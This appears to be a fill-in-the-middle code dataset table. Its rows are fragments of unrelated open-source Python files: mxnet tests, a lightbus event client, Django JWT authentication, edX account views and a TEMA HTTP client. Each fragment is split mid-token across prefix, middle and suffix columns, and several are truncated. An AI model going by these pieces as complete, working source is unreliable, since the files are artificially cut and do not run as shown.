prefix stringlengths 0 918k | middle stringlengths 0 812k | suffix stringlengths 0 962k |
|---|---|---|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distribu | ted with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distribut | ed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import mxnet as mx
import numpy as np
import json
def check_metric(metric, *args, **kwargs):
metric = mx.metric.create(metric, *args, **kwargs)
str_metric = json.dumps(metric.get_config())
metric2 = mx.metric.create(str_metric)
assert metric.get_config() == metric2.get_config()
def test_metrics():
check_metric('acc', axis=0)
check_metric('f1')
check_metric('perplexity', -1)
check_metric('pearsonr')
check_metric('nll_loss')
composite = mx.metric.create(['acc', 'f1'])
check_metric(composite)
def test_nll_loss():
metric = mx.metric.create('nll_loss')
pred = mx.nd.array([[0.2, 0.3, 0.5], [0.6, 0.1, 0.3]])
label = mx.nd.array([2, 1])
metric.update([label], [pred])
_, loss = metric.get()
expected_loss = 0.0
expected_loss = -(np.log(pred[0][2].asscalar()) + np.log(pred[1][1].asscalar())) / 2
assert loss == expected_loss
if __name__ == '__main__':
import nose
nose.runmodule()
|
rnalQueue
from lightbus.utilities.casting import cast_to_signature
from lightbus.utilities.deforming import deform_to_bus
from lightbus.utilities.singledispatch import singledispatchmethod
logger = logging.getLogger(__name__)
class EventClient(BaseSubClient):
def __init__(self, **kwargs):
super().__init__(**kwargs)
self._event_listeners: List[Listener] = []
self._event_listener_tasks = set()
self._listeners_started = False
async def fire_event(
self, api_name, name, kwargs: dict = None, options: dict = None
) -> EventMessage:
kwargs = kwargs or {}
try:
api = self.api_registry.get(api_name)
except UnknownApi:
raise UnknownApi(
"Lightbus tried to fire the event {api_name}.{name}, but no API named {api_name}"
" was found in the registry. An API being in the registry implies you are an"
" authority on that API. Therefore, Lightbus requires the API to be in the registry"
" as it is a bad idea to fire events on behalf of remote APIs. However, this could"
" also be caused by a typo in the API name or event name, or be because the API"
" class has not been registered using bus.client.register_api(). ".format(
**locals()
)
)
validate_event_or_rpc_name(api_name, "event", name)
try:
event = api.get_event(name)
except EventNotFound:
raise EventNotFound(
"Lightbus tried to fire the event {api_name}.{name}, but the API {api_name} does"
" not seem to contain an event named {name}. You may need to define the event, you"
" may also be using the incorrect API. Also check for typos.".format(**locals())
)
p: Parameter
parameter_names = {p.name if isinstance(p, Parameter) else p for p in event.parameters}
required_parameter_names = {
p.name if isinstance(p, Parameter) else p
for p in event.parameters
if getattr(p, "is_required", True)
}
if required_parameter_names and not required_parameter_names.issubset(set(kwargs.keys())):
raise InvalidEventArguments(
"Missing required arguments when firing event {}.{}. Attempted to fire event with "
"{} arguments: {}. Event requires {}: {}".format(
api_name,
name,
len(kwargs),
sorted(kwargs.keys()),
len(parameter_names),
sorted(parameter_names),
)
)
extra_arguments = set(kwargs.keys()) - parameter_names
if extra_arguments:
raise InvalidEventArguments(
"Unexpected argument supplied when firing event {}.{}. Attempted to fire event with"
" {} arguments: {}. Unexpected argument(s): {}".format(
api_name, name, len(kwargs), sorted(kwargs.keys()), sorted(extra_arguments),
)
)
kwargs = deform_to_bus(kwargs)
event_message = EventMessage(
api_name=api.meta.name, event_name=name, kwargs=kwargs, version=api.meta.version
)
validate_outgoing(self.config, self.schema, event_message)
await self.hook_registry.execute("before_event_sent", event_message=event_message)
logger.info(L("📤 Sending event {}.{}".format(Bold(api_name), Bold(name))))
await self.producer.send(SendEventCommand(message=event_message, options=options)).wait()
await self.hook_registry.execute("after_event_sent", event_message=event_message)
return event_message
def listen(
self,
events: List[Tuple[str, str]],
listener: Callable,
listener_name: str,
options: dict = None,
on_error: OnError = OnError.SHUTDOWN,
):
if self._listeners_started:
# We are actually technically able to support starting listeners after worker
# startup, but it seems like it is a bad idea and a bit of an edge case.
# We may revisit this if sufficient demand arises.
raise ListenersAlreadyStarted(
"You are trying to register a new listener after the worker has started running."
" Listeners should be setup in your @bus.client.on_start() hook, in your bus.py"
" file."
)
sanity_check_listener(listener)
for listener_api_name, _ in events:
duplicate_listener = self.get_event_listener(listener_api_name, listener_name)
if duplicate_listener:
raise DuplicateListenerName(
f"A listener with name '{listener_name}' is already registered for API"
f" '{listener_api_name}'. You cannot have multiple listeners with the same name"
" for a given API. Rename one of your listeners to resolve this problem."
)
for api_name, name in events:
validate_event_or_rpc_name(api_name, "event", name)
self._event_listeners.append(
Listener(
callable=listener,
options=options or {},
events=events,
name=listener_name,
on_error=on_error,
)
)
def get_event_listener(self, api_name: str, listener_name: str):
for listener in self._event_listeners:
if listener.name == listener_name:
for listener_api_name, _ in listener.events:
if listener_api_name == api_name:
return listener
return None
async def _on_message(
self, event_message: EventMessage, listener: Callable, options: dict, on_error: OnError
):
# TODO: Check events match those requested
logger.info(
L(
"📩 Received event {}.{} with ID {}".format(
Bold(event_message.api_name), Bold(event_message.event_name), event_message.id
)
)
)
validate_incoming(self.config, self.schema, event_message)
await self.hook_registry.execute("before_event_execution", event_message=event_message)
if self.config.api(event_message.api_name).cast_values:
parameters = cast_to_signature(parameters=event_message.kwargs, callable=listener)
else:
parameters = event_message.kwargs
# Call the listener.
# Pass the event message as a positional argument,
# thereby allowing listeners to have flexibility in the argument names.
# (And therefore allowing listeners to use the `event` parameter themselves)
if on_error == OnError.SHUTDOWN:
# Run the callback in the queue_exception_checker(). This will
# put any errors into Lightbus' error queue, and therefore
# cause a shutdown
await queue_exception_checker(
run_user_provided_callable(listener, args=[event_message], kwargs=parameters),
self.error_queue,
help=(
f"An error occurred while {listener} was handling an event. Lightbus will now"
" shutdown. If you wish to continue you can use the on_error parameter when"
" setting up your event. For example:\n\n bus.my_api.my_event.listen(fn,"
| " listener_name='example', on_error=lightbus.OnError.ACKNOWLEDGE_AND_LOG)"
),
)
elif on_error == on_error.ACKNOWLEDGE_AND_LOG:
try:
await listener(event_message, **parameters)
except asyncio.CancelledError:
raise
except Exception as e:
# Log here. Acknowledgement will follow in below
logger.exception(e)
# A | cknowledge the successfully processed message
await self.producer.send(
AcknowledgeEve |
def extractShibbsdenCom(item):
'''
Parser for 'shibbsden.com'
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return None
tagmap = [
('GOOD CHILD', 'Reborn as a Good Child', 'translated'),
('LUCKY CAT', 'I am the Lucky Cat of an MMORPG', 'translated'),
('PRC', 'PRC', | 'translated'),
('Loiterous', 'Loiterous', 'oel'),
]
for tagname, name, tl_type in tagmap:
if tagname in item['tags']:
return buildReleaseMessageWithType(item, name, vol, chp | , frag=frag, postfix=postfix, tl_type=tl_type)
return False |
from __future__ import unicode_literals
import frappe
def execute():
frappe.reload_doc("pro | jects", "doctype", "project")
frappe.db.sql("""
update `tabProject` p
set total_sales_amount = ifnull((select sum(base_grand_total)
f | rom `tabSales Order` where project=p.name and docstatus=1), 0)
""") |
import logging
from django.utils.html import format_html
import django_tables2 as tables
from django_tables2.rows import BoundPinnedRow, BoundRow
logger = logging.getLogger(__name__)
# A cheat to force BoundPinnedRows to use the same rendering as BoundRows
# otherwise links don't work
# BoundPinnedRow._get_and_render_with = BoundRow._get_and_render_with
class MultiLinkColumn(tables.RelatedLinkColumn):
"""
Like RelatedLinkColumn but allows multiple choices of accessor to be
rendered in a hierarchy, e.g.
accessors = ['foo.bar', 'baz.bof']
text = '{instance.number}: {instance}'
In this case if 'foo.bar' resolves, it will be rendered. Otherwise
'baz.bof' will be tested to resolve, and so on. If nothing renders,
the column will be blank. The text string will resolve using instance.
"""
def __init__(self, accessors, **kwargs):
"""Here we force order by the accessors. By default MultiLinkColumns
have empty_values: () to force calculation every time.
"""
defaults = {
'order_by': accessors,
'empty_values': (),
}
defaults.update(**kwargs)
super().__init__(**defaults)
self.accessors = [tables.A(a) for a in accessors]
def compose_url(self, record, bound_column):
"""Resolve the first accessor which resolves. """
for a in self.accessors:
try:
return a.resolve(record).get_absolute_url()
except (ValueError, AttributeError):
continue
return ""
def text_value(self, record, value):
"""If self.text is set, it will be used as a format string for the
instance returned by the accessor with the keyword `instance`.
"""
for a in self.accessors:
try:
instance = a.resolve(record)
if instance is None:
raise ValueError
except ValueError:
continue
# Use self.text as a format string
if self.text:
return self.text.format(instance=instance, record=record,
value=value)
else:
return str(instance)
# Finally if no accessors were resolved, return value or a blank string
# return super().text_value(record, value)
return value or ""
class XeroLinkColumn(tables.Column):
"""Renders a badge link to the objects record in xero."""
def render(self, value, record=None):
if record.xero_id:
return format_html(
'<span class="badge progress-bar-info">'
'<a class="alert-link" role="button" target="_blank" '
'href="{href}">View in Xero</a></span>',
href=record.get_xero_url()
)
class BaseTable(tables.Table):
class Meta:
| attrs = {"class": "table table-bordered table-striped table-hover "
"table-condensed"}
# @classmethod
# def set_header_color(cls, color):
# """
# Sets all colum | n headers to have this background colour.
# """
# for column in cls.base_columns.values():
# try:
# column.attrs['th'].update(
# {'style': f'background-color:{color};'})
# except KeyError:
# column.attrs['th'] = {'style': f'background-color:{color};'}
def set_header_color(self, color):
"""
Sets all column headers to have this background colour.
"""
for column in self.columns.columns.values():
try:
column.column.attrs['th'].update(
{'style': f'background-color:{color};'})
except KeyError:
column.column.attrs['th'] = {
'style': f'background-color:{color};'}
class ModelTable(BaseTable):
class Meta(BaseTable.Meta):
exclude = ('id',)
class CurrencyColumn(tables.Column):
"""Render a table column as GBP."""
def render(self, value):
return f'£{value:,.2f}'
class NumberColumn(tables.Column):
"""Only render decimal places if necessary."""
def render(self, value):
if value is not None:
return f'{value:n}'
class ColorColumn(tables.Column):
"""Render the colour in a box."""
def __init__(self, *args, **kwargs):
"""This will ignore other attrs passed in."""
kwargs.setdefault('attrs', {'td': {'class': "small-width text-center"}})
super().__init__(*args, **kwargs)
def render(self, value):
if value:
return format_html(
'<div class="color-box" style="background:{};"></div>', value)
|
***********************************************************
QAD Quantum Aided Design plugin ok
classe per gestire il map tool in ambito del comando array
-------------------
begin : 2016-05-31
copyright : iiiii
email : hhhhh
developers | : bbbbb aaaaa ggggg
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License | , or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
from .. import qad_utils
from ..qad_variables import QadVariables
from ..qad_getpoint import QadGetPoint, QadGetPointSelectionModeEnum, QadGetPointDrawModeEnum
from ..qad_highlight import QadHighlight
from ..qad_dim import QadDimStyles, appendDimEntityIfNotExisting
from ..qad_entity import QadCacheEntitySetIterator, QadEntityTypeEnum
from .. import qad_array_fun
#===============================================================================
# Qad_array_maptool_ModeEnum class.
#===============================================================================
class Qad_array_maptool_ModeEnum():
# non si richiede niente
NONE = 0
# si richiede il punto base
ASK_FOR_BASE_PT = 1
# si richiede il primo punto per la distanza tra colonne
ASK_FOR_COLUMN_SPACE_FIRST_PT = 2
# si richiede il primo punto per la dimensione della cella
ASK_FOR_1PT_CELL = 3
# si richiede il psecondo punto per la dimensione della cella
ASK_FOR_2PT_CELL = 4
# si richiede il primo punto per la distanza tra righe
ASK_FOR_ROW_SPACE_FIRST_PT = 5
#===============================================================================
# Qad_array_maptool class
#===============================================================================
class Qad_array_maptool(QadGetPoint):
def __init__(self, plugIn):
QadGetPoint.__init__(self, plugIn)
self.cacheEntitySet = None
self.basePt = None
self.arrayType = None
self.distanceBetweenRows = None
self.distanceBetweenCols = None
self.itemsRotation = None
# serie rettangolare
self.rectangleAngle = None
self.rectangleCols = None
self.rectangleRows = None
self.firstPt = None
# serie traiettoria
self.pathTangentDirection = None
self.pathRows = None
self.pathItemsNumber = None
self.pathPolyline = None
# serie polare
self.centerPt = None
self.polarItemsNumber = None
self.polarAngleBetween = None
self.polarRows = None
self.__highlight = QadHighlight(self.canvas)
def hidePointMapToolMarkers(self):
QadGetPoint.hidePointMapToolMarkers(self)
self.__highlight.hide()
def showPointMapToolMarkers(self):
QadGetPoint.showPointMapToolMarkers(self)
self.__highlight.show()
def clear(self):
QadGetPoint.clear(self)
self.__highlight.reset()
self.mode = None
#============================================================================
# doRectangleArray
#============================================================================
def doRectangleArray(self):
self.__highlight.reset()
dimElaboratedList = [] # lista delle quotature già elaborate
entityIterator = QadCacheEntitySetIterator(self.cacheEntitySet)
for entity in entityIterator:
qadGeom = entity.getQadGeom().copy() # così inizializzo le info qad
# verifico se l'entità appartiene ad uno stile di quotatura
dimEntity = QadDimStyles.getDimEntity(entity)
if dimEntity is not None:
if appendDimEntityIfNotExisting(dimElaboratedList, dimEntity) == False: # quota già elaborata
continue
entity = dimEntity
if qad_array_fun.arrayRectangleEntity(self.plugIn, entity, self.basePt, self.rectangleRows, self.rectangleCols, \
self.distanceBetweenRows, self.distanceBetweenCols, self.rectangleAngle, self.itemsRotation,
False, self.__highlight) == False:
return
#============================================================================
# doPathArray
#============================================================================
def doPathArray(self):
self.__highlight.reset()
dimElaboratedList = [] # lista delle quotature già elaborate
entityIterator = QadCacheEntitySetIterator(self.cacheEntitySet)
for entity in entityIterator:
qadGeom = entity.getQadGeom().copy() # così inizializzo le info qad
# verifico se l'entità appartiene ad uno stile di quotatura
dimEntity = QadDimStyles.getDimEntity(entity)
if dimEntity is not None:
if appendDimEntityIfNotExisting(dimElaboratedList, dimEntity) == False: # quota già elaborata
continue
entity = dimEntity
if qad_array_fun.arrayPathEntity(self.plugIn, entity, self.basePt, self.pathRows, self.pathItemsNumber, \
self.distanceBetweenRows, self.distanceBetweenCols, self.pathTangentDirection, self.itemsRotation, \
self.pathPolyline, self.distanceFromStartPt, \
False, self.__highlight) == False:
return
#============================================================================
# doPolarArray
#============================================================================
def doPolarArray(self):
self.__highlight.reset()
dimElaboratedList = [] # lista delle quotature già elaborate
entityIterator = QadCacheEntitySetIterator(self.cacheEntitySet)
for entity in entityIterator:
qadGeom = entity.getQadGeom().copy() # così inizializzo le info qad
# verifico se l'entità appartiene ad uno stile di quotatura
dimEntity = QadDimStyles.getDimEntity(entity)
if dimEntity is not None:
if appendDimEntityIfNotExisting(dimElaboratedList, dimEntity) == False: # quota già elaborata
continue
entity = dimEntity
if qad_array_fun.arrayPolarEntity(self.plugIn, entity, self.basePt, self.centerPt, self.polarItemsNumber, \
self.polarAngleBetween, self.polarRows, self.distanceBetweenRows, self.itemsRotation, \
False, self.__highlight) == False:
return
def canvasMoveEvent(self, event):
QadGetPoint.canvasMoveEvent(self, event)
# # noto il punto base si richiede il secondo punto
# if self.mode == Qad_array_maptool_ModeEnum.BASE_PT_KNOWN_ASK_FOR_COPY_PT:
# self.setCopiedGeometries(self.tmpPoint)
def activate(self):
QadGetPoint.activate(self)
self.__highlight.show()
def deactivate(self):
try: # necessario perché se si chiude QGIS parte questo evento nonostante non ci sia più l'oggetto maptool !
QadGetPoint.deactivate(self)
self.__highlight.hide()
except:
pass
def setMode(self, mode):
self.mode = mode
# non si richiede niente
if self.mode == Qad_array_maptool_ModeEnum.NONE:
self.setSelectionMode(QadGetPoint |
from django.conf import settings
from django.utils import timezone
from rest_framework import authentication
from rest_framework import exceptions
import datetime
import jwt
from .models import User
def generate_jwt(user):
payload = {
'user': user.pk,
'exp': timezone.now() + datetime.timedelta(weeks=2),
'iat': timezone.now()
}
return jwt.encode(payload, settings.SECRET_KEY)
def decode_jwt(tok | en):
return jwt.decode(token, settings.SECRET_KEY)
class JWTAuthentication(authentication.BaseAuthentication):
def authenticate(self, request):
token = self._get_jwt_from_header(request)
try:
payload = decode_jwt(token)
except jwt.ExpiredSignature:
detail = 'Signature has expired.'
raise excepti | ons.AuthenticationFailed(detail=detail)
except jwt.DecodeError:
detail = 'Error decoding token.'
raise exceptions.AuthenticationFailed(detail=detail)
except jwt.InvalidTokenError:
raise exceptions.AuthenticationFailed()
user = self._get_user_by_id(payload)
return (user, token)
def _get_jwt_from_header(self, request):
auth_header = authentication.get_authorization_header(request)
if not auth_header:
detail = 'No Authorization header present.'
raise exceptions.AuthenticationFailed(detail=detail)
try:
prefix, token = auth_header.split()
except ValueError:
detail = 'Invalid Authorization header.'
raise exceptions.AuthenticationFailed(detail=detail)
return token
def _get_user_by_id(self, payload):
user_pk = payload['user']
try:
return User.objects.get(pk=user_pk)
except User.DoesNotExist:
detail = 'Invalid payload.'
raise exceptions.AuthenticationFailed(detail=detail)
|
rson obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import httplib
import urllib
import socket
class ToolProtocolHTTP(object):
"""
HTTP/HTTPS client for TEMA MBT protocol. Discusses with the TEMA test engine.
"""
# is client connected to the server
isConnected = False
def __init__(self):
self.host = "localhost"
self.port = 80
self.php_file = "temagui_http_proxy.php"
socket.setdefaulttimeout(1800)
def __del__(self):
if self.isConnected:
http_params = urllib.urlencode({"User" : self.username, "Message" : 'CLOSE', "Parameter" : 'Empty'})
http_data = self.__requestreply(http_params)
def __requestreply(self,message ):
""" One http(s) request/reply.
Message: Message to send string.
Returns: Reply string.
"""
http_data = ''
try:
http_connection = None
if self.protocol == "HTTP":
http_connection = httplib.HTTPConnection(self.host, self.port)
elif self.protocol == "HTTPS":
http_connection = httplib.HTTPSConnection(self.host, self.port)
else:
return ''
http_connection.connect()
http_connection.request("POST", self.php_file, message , self.http_headers)
http_response = http_connection.getresponse()
http_data = http_response.read()
http_response.close()
http_connection.close()
except Exception, e:
http_data = ''
return http_data
def init(self, host, path, port, username, protocol):
""" Initialises connection. Sends HELO.
host: Server hostname.
path: path to http proxy in server.
port: port
username: wwwgui username
protocol: http/https
returns: Reply to ACK. On error returns ''
"""
self.http_headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
self.host = host
self.php_file = "/".join(["",path,"temagui_http_proxy.php"])
self.port = port
self.username = username
self.protocol = protocol.upper()
try:
# SEND HELO
http_params = urllib.urlencode({"User" : username, "Message" : 'HELO', "Parameter" : 'Empty'})
http_data = self.__requestreply(http_params)
self.isConnected = True
lines = http_data.splitlines()
if lines != []:
message = lines.pop()
if message == "CLOSE":
http_data = ''
self.isConnected = False
except Exception, e:
self.isConnected = False
return ''
return http_data
def getKeyword(self):
""" Gets keyword from testserver.
Sends GET to te | stserver and waits for reply.
Returns: Reply to GET. On error return ''
"""
http_data = ''
try:
http_params = urllib.urlencode({"User" : self.username, "Message" : 'GET', "Parameter" : 'Empty'})
http_data = self.__requestreply(http_params)
lines = http_data.splitlines()
if lines != []:
message | = lines.pop()
if message == "CLOSE":
self.isConnected = False
return 'ERROR'
if message == 'ERR':
# TODO: don't send ack.
http_data = self.__requestreply(http_params)
http_params = urllib.urlencode({"User" : self.username, "Message" : 'ACK', "Parameter" : 'Empty'})
http_data = self.__requestreply(http_params)
self.isConnected = False
return 'ERROR'
if not http_data.startswith("ACK"):
print http_data
return "ERROR"
else:
#http_data = http_data.partition("ACK")[2].strip()
http_data = http_data.split("ACK")[1].strip()
if http_data == '' or http_data == None:
http_data = ''
self.isConnected = False
except Exception, e:
self.isConnected = False
return http_data
def putResult(self, result):
""" Puts result to testserver.
result: True/False
returns: Reply message to PUT
"""
try:
if result:
http_params = urllib.urlencode({"User" : self.username, "Message" : 'PUT', "Parameter" : 'true'})
else:
http_params = urllib.urlencode({"User" : self.username, "Message" : 'PUT', "Parameter" : 'false'})
except Exception, e:
self.isConnected = False
return ''
try:
http_data = self.__requestreply(http_params)
lines = http_data.splitlines()
if lines != []:
message = lines.pop()
if message == "CLOSE":
self.isConnected = False
return ''
if http_data == '':
self.isConnected = False
except Exception, e:
self.isConnected = False
http_data = ''
return http_data
def log(self, msg):
""" Sends log message to testserver
returns: Reply to message.
"""
http_data = ''
try:
http_params = urllib.urlencode({"User" : self.username, "Message" : 'LOG', "Parameter" : msg })
http_data = self.__requestreply(http_params)
lines = http_data.splitlines()
if lines != []:
message = lines.pop()
if message == "CLOSE":
self.isConnected = False
return ''
if http_data == '':
self.isConnected = False
except Exception, e:
self.isConnected = False
http_data = ''
return http_data
def bye(self):
""" Sends message BYE to testserver. """
http_data = ''
try:
http_params = urllib.urlencode({"User" : self.username, "Message" : 'BYE', "Parameter" : 'None'})
http_data = self.__requestreply(http_params)
self.isConnected = False
except Exception, e:
self.isConnected = False
return ''
def hasConnection(self):
return self.isConnected
if __name__ == "__main__":
c = ToolProtocol()
print "init -> " + c.init()
print "getKeyword -> " + c.getKeyword()
print "putResult |
# encoding: utf-8
# module samba.dcerpc.drsuapi
# from /usr/lib/python2.7/dist-packages/samba/dcerpc/drsuapi.so
# by generator 1.135
""" drsuapi DCE/RPC """
# imports
import dcerpc as __dcerpc
import talloc as __talloc
class D | sReplicaObjMetaData2Ctr(__talloc.Object):
# no doc
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; re | stored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
array = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
count = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
enumeration_context = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
|
'd'
def x():
print j
j = 0
def y():
| for x in []:
print | x
|
# Copyright 2019 The Sonnet Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""TensorFlow op that scales gradient for backwards pass."""
from typing import Tuple
from sonnet.src import types
import tensorflow as tf
@tf.custom_gradient
def scale_gradient(
t: tf.Tensor, scale: types.Floa | tLike
) -> Tuple[tf.Tensor, types.GradFn]:
"""Scales gradients for the backwards pass.
Args:
t: A Tensor.
scale: The scale factor for the gradient on | the backwards pass.
Returns:
A Tensor same as input, with scaled backward gradient.
"""
def grad(dy: tf.Tensor) -> Tuple[tf.Tensor, None]:
"""Scaled gradient."""
return scale * dy, None
return t, grad
|
##
## This copyrighted software is distributed under the GPL v2.0 license.
## See the LICENSE file for more details.
##
## Yeast workspace configuration file
import numpy as np
import WorkspaceModules.YeastApplicatorPlate
import WorkspaceModules.YeastArena
import WorkspaceModules.YeastArena3x3
YeastWorkspace = { 'baseThickness': 2.93, 'yeastApplicatorPlate': Wo | rkspaceModules.YeastApplicatorPlate.YeastApplicatorPlate(422.0, 247),
| 'yeastArena': WorkspaceModules.YeastArena.YeastArena(285, 139),
'yeastArena3x3': WorkspaceModules.YeastArena3x3.YeastArena3x3(124, 36) }
|
d running?")
log.critical("Login failed - Could not create session. Is memcached running?")
log.exception(exc)
raise
redirect_url = None # The AJAX method calling should know the default destination upon success
if third_party_auth_successful:
redirect_url = pipeline.get_complete_url(backend_name)
response = JsonResponse({
"success": True,
"redirect_url": redirect_url,
})
# Ensure that the external marketing site can
# detect that the user is logged in.
return set_logged_in_cookie(request, response)
if settings.FEATURES['SQUELCH_PII_IN_LOGS']:
AUDIT_LOG.warning(u"Login failed - Account not active for user.id: {0}, resending activation".format(user.id))
else:
AUDIT_LOG.warning(u"Login failed - Account not active for user {0}, resending activation".format(username))
reactivation_email_for_user(user)
not_activated_msg = _("This account has not been activated. We have sent another activation message. Please check your email for the activation instructions.")
return JsonResponse({
"success": False,
"value": not_activated_msg,
}) # TODO: this should be status code 400 # pylint: disable=fixme
@csrf_exempt
@require_POST
@social_utils.strategy("social:complete")
def login_oauth_token(request, backend):
"""
Authenticate the client using an OAuth access token by using the token to
retrieve information from a third party and matching that information to an
existing user.
"""
warnings.warn("Please use AccessTokenExchangeView instead.", DeprecationWarning)
backend = request.backend
if isinstance(backend, social_oauth.BaseOAuth1) or isinstance(backend, social_oauth.BaseOAuth2):
if "access_token" in request.POST:
# Tell third party auth pipeline that this is an API call
request.session[pipeline.AUTH_ENTRY_KEY] = pipeline.AUTH_ENTRY_LOGIN_API
user = None
try:
user = backend.do_auth(request.POST["access_token"])
except (HTTPError, AuthException):
pass
# do_auth can return a non-User object if it fails
if user and isinstance(user, User):
login(request, user)
return JsonResponse(status=204)
else:
# Ensure user does not re-enter the pipeline
request.social_strategy.clean_partial_pipeline()
return JsonResponse({"error": "invalid_token"}, status=401)
else:
return JsonResponse({"error": "invalid_request"}, status=400)
raise Http404
@ensure_csrf_cookie
def logout_user(request):
"""
HTTP request to log out the user. Redirects to marketing page.
Deletes both the CSRF and sessionid cookies so the marketing
site can determine the logged in state of the user
"""
# We do not log here, because we have a handler registered
# to perform logging on successful logouts.
logout(request)
if settings.FEATURES.get('AUTH_USE_CAS'):
target = reverse('cas-logout')
else:
target = '/'
response = redirect(target)
response.delete_cookie(
settings.EDXMKTG_COOKIE_NAME,
path='/', domain=settings.SESSION_COOKIE_DOMAIN,
)
return response
@require_GET
@login_required
@ensure_csrf_cookie
def manage_user_standing(request):
"""
Renders the view used to manage user standing. Also displays a table
of user accounts that have been disabled and who disabled them.
"""
if not request.user.is_staff:
raise Http404
all_disabled_accounts = UserStanding.objects.filter(
account_status=UserStanding.ACCOUNT_DISABLED
)
all_disabled_users = [standing.user for standing in all_disabled_accounts]
headers = ['username', 'account_changed_by']
rows = []
for user in all_disabled_users:
row = [user.username, user.standing.all()[0].changed_by]
rows.append(row)
context = {'headers': headers, 'rows': rows}
return render_to_response("manage_user_standing.html", context)
@require_POST
@login_required
@ensure_csrf_cookie
def disable_account_ajax(request):
"""
Ajax call to change user standing. Endpoint of the form
in manage_user_standing.html
"""
if not request.user.is_staff:
raise Http404
username = request.POST.get('username')
context = {}
if username is None or username.strip() == '':
context['message'] = _('Please enter a username')
return JsonResponse(context, status=400)
account_action = request.POST.get('account_action')
if account_action is None:
context['message'] = _('Please choose an option')
return JsonResponse(context, status=400)
username = username.strip()
try:
user = User.objects.get(username=username)
except User.DoesNotExist:
context['message'] = _("User with username {} does not exist").format(username)
return JsonResponse(context, status=400)
else:
user_account, _success = UserStanding.objects.get_or_create(
user=user, defaults={'changed_by': request.user},
)
if account_action == 'disable':
user_account.account_status = UserStanding.ACCOUNT_DISABLED
context['message'] = _("Successfully disabled {}'s account").format(username)
log.info(u"%s disabled %s's account", request.user, username)
elif account_action == 'reenable':
user_account.account_status = UserStanding.ACCOUNT_ENABLED
context['message'] = _("Successfully reenabled {}'s account").format(username)
log.info(u"%s reenabled %s's account", requ | est.user, username)
else:
context['message'] = _("Unexpected account status")
return JsonResponse(context, status=400)
user_account.changed_by = request.user
user_account.standing_last_changed_at = datetime.datetime.now(UTC)
user_account.save()
return JsonResponse(context)
@login_required
@ensure_csrf_cookie
def change_setting(request):
"""JSON c | all to change a profile setting: Right now, location"""
# TODO (vshnayder): location is no longer used
u_prof = UserProfile.objects.get(user=request.user) # request.user.profile_cache
if 'location' in request.POST:
u_prof.location = request.POST['location']
u_prof.save()
return JsonResponse({
"success": True,
"location": u_prof.location,
})
class AccountValidationError(Exception):
def __init__(self, message, field):
super(AccountValidationError, self).__init__(message)
self.field = field
@receiver(post_save, sender=User)
def user_signup_handler(sender, **kwargs): # pylint: disable=unused-argument
"""
handler that saves the user Signup Source
when the user is created
"""
if 'created' in kwargs and kwargs['created']:
site = microsite.get_value('SITE_NAME')
if site:
user_signup_source = UserSignupSource(user=kwargs['instance'], site=site)
user_signup_source.save()
log.info(u'user {} originated from a white labeled "Microsite"'.format(kwargs['instance'].id))
def _do_create_account(form):
"""
Given cleaned post variables, create the User and UserProfile objects, as well as the
registration for this user.
Returns a tuple (User, UserProfile, Registration).
Note: this function is also used for creating test users.
"""
if not form.is_valid():
raise ValidationError(form.errors)
user = User(
username=form.cleaned_data["username"],
email=form.cleaned_data["email"],
is_active=False
)
user.set_password(form.cleaned_data["password"])
registration = Registration()
# TODO: Rearrange so that if part of the process fails, the whole process fails.
# Right now, we can have e.g. no registration e-mail sent out and a zombie account
try:
user.save()
except IntegrityError:
# Figure out the |
# Copyright Microsoft Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" B | ASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Requires Python 2.6+ and Openssl 1.0+
#
import xml
from tests | .tools import *
from azurelinuxagent.common.protocol.wire import *
from azurelinuxagent.common.osutil import get_osutil
